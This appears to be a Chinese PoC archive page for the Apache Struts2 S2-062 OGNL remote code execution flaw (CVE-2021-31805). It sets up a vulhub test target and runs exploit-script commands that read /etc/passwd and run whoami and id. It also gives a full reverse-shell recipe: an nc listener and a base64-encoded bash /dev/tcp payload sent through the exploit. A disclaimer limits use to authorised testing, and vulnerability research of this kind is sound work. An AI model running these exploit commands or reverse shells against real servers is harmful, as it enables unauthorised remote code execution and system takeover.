关联漏洞
标题:
Apache Struts 2 安全漏洞
(CVE-2021-31805)
描述:Apache Struts 2是美国阿帕奇(Apache)基金会的一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。 Apache Struts 2.0.0版本至2.5.29版本存在安全漏洞,该漏洞源于对不受信任的用户输入在标签属性中使用强制 OGNL 评估。攻击者可利用该漏洞进行远程代码执行并导致安全性降低。
描述
Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) | 反弹Shell
介绍
# Struts2_S2-062_CVE-2021-31805
Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) | 反弹Shell
# 漏洞复现环境
docker-compose.yml
```
version: '2'
services:
struts2:
image: vulhub/struts2:2.5.25
ports:
- "8080:8080"
```
拉取镜像启动环境
```
docker-compose up -d
```
访问地址:http://1.1.1.1:8080
# 漏洞验证脚本
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"
```
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami
```
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id
```
# 反弹Shell
## NC开启端口监听
```
nc -lvvp 8081
```
构造base64编码反弹shell脚本,利用如下网站生成:https://ir0ny.top/pentest/reverse-encoder-shell.html
## 获取Shell
```
python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"
```
## 成功获取Shell
# 免责声明
请勿用于非法的用途,仅做安全测试,否则造成的后果与本项目无关。
注:要在正规授权情况下测试网站:日站不规范,亲人泪两行。
文件快照
[4.0K] /data/pocs/f1be6d3a04d6d6831d107b3b702cf9ba20149e59
├── [2.0K] CVE-2021-31805_Shell.py
├── [4.0K] images
│ ├── [ 35K] base64.png
│ ├── [ 11K] id.png
│ ├── [ 70K] NC.png
│ ├── [ 53K] passwd.png
│ ├── [ 1] README.md
│ ├── [ 10K] root.png
│ ├── [296K] Shell_code.png
│ └── [ 49K] shell.png
├── [1.4K] README.md
├── [ 52] requirements.txt
└── [2.1K] Struts2_S2-062_CVE-2021-31805.py
1 directory, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。